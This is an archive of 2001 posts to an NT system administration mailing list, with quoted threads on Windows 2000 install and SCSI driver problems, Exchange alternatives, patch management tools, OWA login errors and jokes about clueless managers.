RE: Net outage??

[Clark, Steve]

My hosting company still is blaming outages on Nimda. Doesn't seem to matter
that everyone else has patched and updated - they still are having problems.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Bunting, Jeff [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 10:18 PM
To: NT System Admin Issues
Subject: Net outage??

Anyone else noticing routing problems tonight (10pm EDT)?  I'm wondering if
there's some sort of major outage going on somewhere.  I'm haing traceroutes
fail theough several different networks (AT&T, Bell Atlantic, Sprint,
others)

Jeff

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: W2K Pro Install

[Clark, Steve]

Title: Message









Oh – that’s was you in the bushes today. They wanted to install modems
in each PC for internet access.

 

I about died

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Sean Martin
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:40 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

 

Don't you love it when
you're paid by the hour and you get to a client's site that need 300mb's worth
of drivers downloaded and they only have a shared dialup for internet access
;o)

 

Regards,

 

Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]

-Original
Message-
From: c.e. gene connor
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
4:47 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

please don't take this
the wrong way. I have made my income since 1981 and full time since 1989 from
uncle bill. the only reason that you should ever use the drivers that came with
windows is!! if you can't locate or have the hardware drivers from the makers
of the items at question.

 

they put there drivers in
there for the newbies that are doing the installs. most of the time a hardware
conflict is cause from drives ect. 

 

this comment is only made
from someone that makes money from people that don't use manf. drivers or
update there drivers after a o/s install.

 

Gene C. aka C.E. Gene Connor
Gene's Custom PC Service since 1989
Serving the U.S., Canada & London,England

>From the start of our nation we've stood for no crap,
We've handled the toughest all over the map.
Osama Bin Laden, a cowardly try,
Hasn't anyone told you "Let sleeping Dogs lie"?
Feel the Sand on your toes, how HOT can it get.
Don't celebrate now, it ain't over yet!
A fire in the sky, turns the SAND INTO GLASS !
Osama Bin Laden, Kiss my AMERICAN A**




-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:23 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Anyone have problems with the MS drivers for the
2940UW in NT 4 - I've got a backup problem that has plagued me for long time
and the Adaptec drivers are the only thing I have not replaced (yet).

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

"Who's watching your network?"

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Steve Woods
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:24 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

 

So you install
Windows 2K using Microsoft drivers? I need my servers up and solid. I'll use
the mfg. drivers over MS any day.

-Original
Message-
From: Greg Page
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
5:13 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Adaptec
2940UW drivers are native to W2K.

 

 

Greg

-Original
Message-
From: Steve Woods
[mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 27, 2001
3:51 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Have you
tried install the MFG. drivers for the SCSI card using F6 during the install?

-Original
Message-
From: Network Issues
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
12:18 PM
To: NT System Admin Issues
Subject: W2K Pro Install

Goodmorning All,

 

I've been working on installing W2K Pro on a
test box and I continually receive an error during the setup process.

 

I am able to get to the portion of the CD
install where it begins copying files to the hard drive.  However, each time at about 17% or 18%
of the process I receive an error that a particular file cannot be copied to
the hard drive.  I can hit retry
and the same message reappears. 
The message further states that there is something wrong with the CD and
if the error persists to call MS Support.

 

The test system is a P3/600 with 2 SCSI drives
running off of an Adaptec 2940UW controller.  I have swapped all of the parts out:  SCSI cables, IDE cable for the CD, the
actual CD and I've also used 3 different copies of W2K Professional on CD.

 

I really don't want to call MS.  Anyone have any suggestions?

 

TIA

 

Ron

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2kn

RE: W2K Pro Install

[Clark, Steve]

Title: Message









No offense taken – are you aware of any problems that may occur when
replacing the drivers from MS to Adaptec.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: c.e. gene connor
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:47 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

 

please don't take this
the wrong way. I have made my income since 1981 and full time since 1989 from
uncle bill. the only reason that you should ever use the drivers that came with
windows is!! if you can't locate or have the hardware drivers from the makers
of the items at question.

 

they put there drivers in
there for the newbies that are doing the installs. most of the time a hardware
conflict is cause from drives ect. 

 

this comment is only made
from someone that makes money from people that don't use manf. drivers or
update there drivers after a o/s install.

 

Gene C. aka
C.E. Gene Connor
Gene's Custom PC Service since 1989
Serving the U.S., Canada & London,England

>From the start of our nation we've stood for no crap,
We've handled the toughest all over the map.
Osama Bin Laden, a cowardly try,
Hasn't anyone told you "Let sleeping Dogs lie"?
Feel the Sand on your toes, how HOT can it get.
Don't celebrate now, it ain't over yet!
A fire in the sky, turns the SAND INTO GLASS !
Osama Bin Laden, Kiss my AMERICAN A**




-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:23 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Anyone have problems with the MS drivers for the 2940UW
in NT 4 – I’ve got a backup problem that has plagued me for long time and the
Adaptec drivers are the only thing I have not replaced (yet).

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Steve Woods
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:24 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

 

So you
install Windows 2K using Microsoft drivers? I need my servers up and solid.
I'll use the mfg. drivers over MS any day.

-Original
Message-
From: Greg Page
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
5:13 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Adaptec
2940UW drivers are native to W2K.

 

 

Greg

-Original
Message-
From: Steve Woods
[mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 27, 2001
3:51 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Have you
tried install the MFG. drivers for the SCSI card using F6 during the install?

-Original
Message-
From: Network Issues
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
12:18 PM
To: NT System Admin Issues
Subject: W2K Pro Install

Goodmorning All,

 

I've been working on installing W2K Pro on a
test box and I continually receive an error during the setup process.

 

I am able to get to the portion of the CD
install where it begins copying files to the hard drive.  However, each time at about 17% or 18%
of the process I receive an error that a particular file cannot be copied to
the hard drive.  I can hit retry
and the same message reappears. 
The message further states that there is something wrong with the CD and
if the error persists to call MS Support.

 

The test system is a P3/600 with 2 SCSI drives
running off of an Adaptec 2940UW controller.  I have swapped all of the parts out:  SCSI cables, IDE cable for the CD, the
actual CD and I've also used 3 different copies of W2K Professional on CD.

 

I really don't want to call MS.  Anyone have any suggestions?

 

TIA

 

Ron

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: W2K Pro Install

[Clark, Steve]

Title: Message









Anyone have
problems with the MS drivers for the 2940UW in NT 4 – I’ve got a backup problem
that has plagued me for long time and the Adaptec drivers are the only thing I
have not replaced (yet).

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Steve Woods
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
8:24 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

 

So you install Windows 2K
using Microsoft drivers? I need my servers up and solid. I'll use the mfg.
drivers over MS any day.

-Original
Message-
From: Greg Page
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
5:13 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Adaptec 2940UW drivers
are native to W2K.

 

 

Greg

-Original
Message-
From: Steve Woods [mailto:[EMAIL PROTECTED]]

Sent: Thursday, September 27, 2001
3:51 PM
To: NT System Admin Issues
Subject: RE: W2K Pro Install

Have you tried install
the MFG. drivers for the SCSI card using F6 during the install?

-Original
Message-
From: Network Issues
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001
12:18 PM
To: NT System Admin Issues
Subject: W2K Pro Install

Goodmorning All,

 

I've been working on installing W2K Pro on a
test box and I continually receive an error during the setup process.

 

I am able to get to the portion of the CD
install where it begins copying files to the hard drive.  However, each time at about 17% or 18%
of the process I receive an error that a particular file cannot be copied to
the hard drive.  I can hit retry
and the same message reappears. 
The message further states that there is something wrong with the CD and
if the error persists to call MS Support.

 

The test system is a P3/600 with 2 SCSI drives
running off of an Adaptec 2940UW controller.  I have swapped all of the parts out:  SCSI cables, IDE cable for the CD, the
actual CD and I've also used 3 different copies of W2K Professional on CD.

 

I really don't want to call MS.  Anyone have any suggestions?

 

TIA

 

Ron

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Exchange/Outlook Alternatives

[Clark, Steve]

Mark -

We're in the same boat. Regardless of how many times I ask the same
question, I get the same answer - nothing compares to Exchange. As servers
are cheap in the overall scheme of things - if the company can not afford to
do Exchange, I still rely on ISP mail. In between the ISP and the office, I
use a software product called Software 602 which handles the pull portion.
In addition, I looked at the email from Deerfield but am REALLY pissed at
them and will not resell or purchase any of their products anymore.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mark [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 7:56 PM
To: NT System Admin Issues
Subject: Exchange/Outlook Alternatives

I'm constantly asked for recommendations on VIABLE alternatives to the
MS Outlook/Exchange groupware system. Let's face it: Exchange is
expensive, and does a lot of things that most of my SMB customers will
never need. I've seen a few different products, but have yet to find one
that integrates and works as well as Outlook with an Exchange server.

Do you guys have any ideas on substitutes. The main core features that
most SMB's use would be the scheduling/calendaring , POP/IMAP email, and
address book. It'd be nice to have the whole lot integrated, but
seperate products with a good UI would do. The email and address book
clients are easy enough to find, but what about calendaring? Something
with the ability to both share an office calendar, and have seperate
(but viewable) calendars for each worker. Editor priveleges for a
secretary on specific calendars would be a plus, as well. To complicate
it a bit further, how about something that would work on a peer-to-peer
network (< 10 PC's) with no dedicated server? Any thoughts?

Yí¶‹Z鏶zm
6岒w&ᮚ'{lמu(@A:牤w-i⁦0⁵m歫^req&楨

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: hfnetchk

[Clark, Steve]

Put the facts in front of your boss - how can they say no?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Chris Kim [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 7:48 PM
To: NT System Admin Issues
Subject: RE: hfnetchk

steve, i'll agree w/ you on all that.  i'm probably just bitter that my boss
won't buy me a copy.

Chris Kim
IT Engineer
The Igneous Group, Inc.
541 Seabright Ave.
Santa Cruz, CA 95062
1-831-469-7625 X217 Voice
1-831-460-3979 FAX
1-831-234-8059 Cell
<<mailto:[EMAIL PROTECTED]>>
<<http://www.igneous.com/>>
Rock Solid Web Sites



-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 4:37 PM
To: NT System Admin Issues
Subject: RE: hfnetchk


Think about how long it takes you to find, download, test, build the install
and then install 1 patch. By purchasing the Update Expert software, you are
in essence paying a service to find, download, test and build the install.
All you have to do is point to the machine and click install. I was able to
patch my server with everything including the rollup patches in a few short
clicks as opposed to the old way.

Saved me time which in this business is money.

The low end license is 75 NT or W2K machines - also updates for IIS, SQL,
Exchange OS etc... Retail is $1500 but can be lower depending on where you
purchase. After I researched products, I found it to be an opportunity I
could not pass up - I became a reseller as well.

My $.02 - not as a salesperson, but as a administrator, owner and
accountant.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Chris Kim [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 6:45 PM
To: NT System Admin Issues
Subject: RE: hfnetchk

update expert is a super cool tool, but mucho$$ (about a grand for 40
client/server license)

Chris Kim
IT Engineer
The Igneous Group, Inc.
541 Seabright Ave.
Santa Cruz, CA 95062
1-831-469-7625 X217 Voice
1-831-460-3979 FAX
1-831-234-8059 Cell
<<mailto:[EMAIL PROTECTED]>>
<<http://www.igneous.com/>>
Rock Solid Web Sites



-Original Message-
From: Bob Barnhill [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 2:48 PM
To: NT System Admin Issues
Subject: Re: hfnetchk


Try Update Expert (www.stbernard.com)


>From: "Don Collier (Intermap Denver)" <[EMAIL PROTECTED]>
>Reply-To: "NT System Admin Issues" <[EMAIL PROTECTED]>
>To: "NT System Admin Issues" <[EMAIL PROTECTED]>
>Subject: hfnetchk
>Date: Thu, 27 Sep 2001 15:02:39 -0400
>
>So I ran this cool program, that someone on this list mentioned, and got
>this list of patches that I need to install.  Thankfully not very many at
>all.  I know where to go to get the patches individually, but is there a
>place to get several of the patches at one time.  I also ran that program
>on
>other machines and need to get patches for them as well.
>
>
>
>_
>Don Collier
>Network Administrator
>Intermap Technologies Inc.
>Voice:  303-708-0955 x-207
>Fax:303-708-0952
>[EMAIL PROTECTED]
>www.intermaptechnologies.com
>
>
>
>
>Want to unsub? Do that here:
>http://www.w2knews.com/rd/rd.cfm?id=unsub
>Need a good FAQ? Try this one first:
>http://www.ultratech-llc.com/KB/
>


_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: hfnetchk

[Clark, Steve]

Think about how long it takes you to find, download, test, build the install
and then install 1 patch. By purchasing the Update Expert software, you are
in essence paying a service to find, download, test and build the install.
All you have to do is point to the machine and click install. I was able to
patch my server with everything including the rollup patches in a few short
clicks as opposed to the old way.

Saved me time which in this business is money.

The low end license is 75 NT or W2K machines - also updates for IIS, SQL,
Exchange OS etc... Retail is $1500 but can be lower depending on where you
purchase. After I researched products, I found it to be an opportunity I
could not pass up - I became a reseller as well.

My $.02 - not as a salesperson, but as a administrator, owner and
accountant.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Chris Kim [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 6:45 PM
To: NT System Admin Issues
Subject: RE: hfnetchk

update expert is a super cool tool, but mucho$$ (about a grand for 40
client/server license)

Chris Kim
IT Engineer
The Igneous Group, Inc.
541 Seabright Ave.
Santa Cruz, CA 95062
1-831-469-7625 X217 Voice
1-831-460-3979 FAX
1-831-234-8059 Cell
<>
<>
Rock Solid Web Sites



-Original Message-
From: Bob Barnhill [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 2:48 PM
To: NT System Admin Issues
Subject: Re: hfnetchk


Try Update Expert (www.stbernard.com)


>From: "Don Collier (Intermap Denver)" <[EMAIL PROTECTED]>
>Reply-To: "NT System Admin Issues" <[EMAIL PROTECTED]>
>To: "NT System Admin Issues" <[EMAIL PROTECTED]>
>Subject: hfnetchk
>Date: Thu, 27 Sep 2001 15:02:39 -0400
>
>So I ran this cool program, that someone on this list mentioned, and got
>this list of patches that I need to install.  Thankfully not very many at
>all.  I know where to go to get the patches individually, but is there a
>place to get several of the patches at one time.  I also ran that program
>on
>other machines and need to get patches for them as well.
>
>
>
>_
>Don Collier
>Network Administrator
>Intermap Technologies Inc.
>Voice:  303-708-0955 x-207
>Fax:303-708-0952
>[EMAIL PROTECTED]
>www.intermaptechnologies.com
>
>
>
>
>Want to unsub? Do that here:
>http://www.w2knews.com/rd/rd.cfm?id=unsub
>Need a good FAQ? Try this one first:
>http://www.ultratech-llc.com/KB/
>


_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: OT - Win98 Dial-up Starting at Startup

[Clark, Steve]

Look at what's in the start up folder or starts up in the system tray - for
example, Black ICE can be set to update each time it starts.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Kenneth Hoffman [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 12:11 AM
To: NT System Admin Issues
Subject: OT - Win98 Dial-up Starting at Startup

Greetings,

For the moment I am brain dead.  I have a friend that ahs a Win98SE box that
on start-up tries to connect to the internet even though it is not in the
Start-up folder.

I cannot remember how to disable it.  Any thoughts?

Ken Hoffman.


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: OWA

[Clark, Steve]

Make sure
you have the correct alias when logging in

Make sure
you are in the log on locally group

Look at
your logs to see what is being reported

Click on
the troubleshooter that comes up when you get a failed to login message

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Dave Gushi
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26,
2001 11:20 PM
To: NT System Admin Issues
Subject: OWA

 

I am
trying to setup my exchange 5.5 server with OWA. I did everything I know how to
do I added it form my exchange setup 
CD. I created a website for it. Any way all I keep getting is an error
message that says you are not authorized to view this site I've played around
with the security settings and I can't get it to work any ideas?  

 

Dave Gushi



 



 



God Bless America!



 



 



 

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Testing 1, 2, 3 - Ignore

[Clark, Steve]

Did he work with arcnet once upon a time?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Dave Gushi [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:56 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

This is very funny stuff. It seams the more money some managers make the
less they know.  I have a VP that thinks the closer he is to the server the
better data response he's going to get.

Dave Gushi


God Bless America!




-Original Message-
From: Bill Higgins [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 7:50 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

almost as bad as a mangaler (manager) that I had that constantly told people
that we had an AtherNet (can you say "ethernet") network running Novel
(as in book) Server.

I didn't have the heart to tell him that we were actually broken ring...


Two more sleeps til Vegas (1)

(1) Hi William

-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 17:45
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


Did you hear the wind?

I had a "tech" manager years ago that referred to all networks as LAND's and
portables as Labtops. Thought the joke would transfer.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:43 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

No, but he may be trying to setup that LAN

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:41 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


Uh huh, trying to set up that LAND aren't you?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential
and/or privileged information intended only for the addressee. If you
have received this communication in error, please call us immediately at
(907) 561-1250 and ask to speak to the sender of the communication.
Also, please e-mail the sender and notify the sender immediately that
you have received the communication in error.

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Testing 1, 2, 3 - Ignore

[Clark, Steve]

That's great - LMAO.

I've gotten cold calls from companies looking to see if I can fix their
novelle client server from Microsoft. Another client asked if I would
install that Microsoft thing from the commercial - the one with the boxes
and everyone's at a party - I asked her if she was talking about the data
center. She said yes - this was in a hardware store with 2 PC's and a UNIX
POS shop.

Damm ethics.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Bill Higgins [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:50 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

almost as bad as a mangaler (manager) that I had that constantly told people
that we had an AtherNet (can you say "ethernet") network running Novel
(as in book) Server.

I didn't have the heart to tell him that we were actually broken ring...


Two more sleeps til Vegas (1)

(1) Hi William

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 17:45
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


Did you hear the wind?

I had a "tech" manager years ago that referred to all networks as LAND's and
portables as Labtops. Thought the joke would transfer.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:43 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

No, but he may be trying to setup that LAN

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:41 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


Uh huh, trying to set up that LAND aren't you?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential
and/or privileged information intended only for the addressee. If you
have received this communication in error, please call us immediately at
(907) 561-1250 and ask to speak to the sender of the communication.
Also, please e-mail the sender and notify the sender immediately that
you have received the communication in error.

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
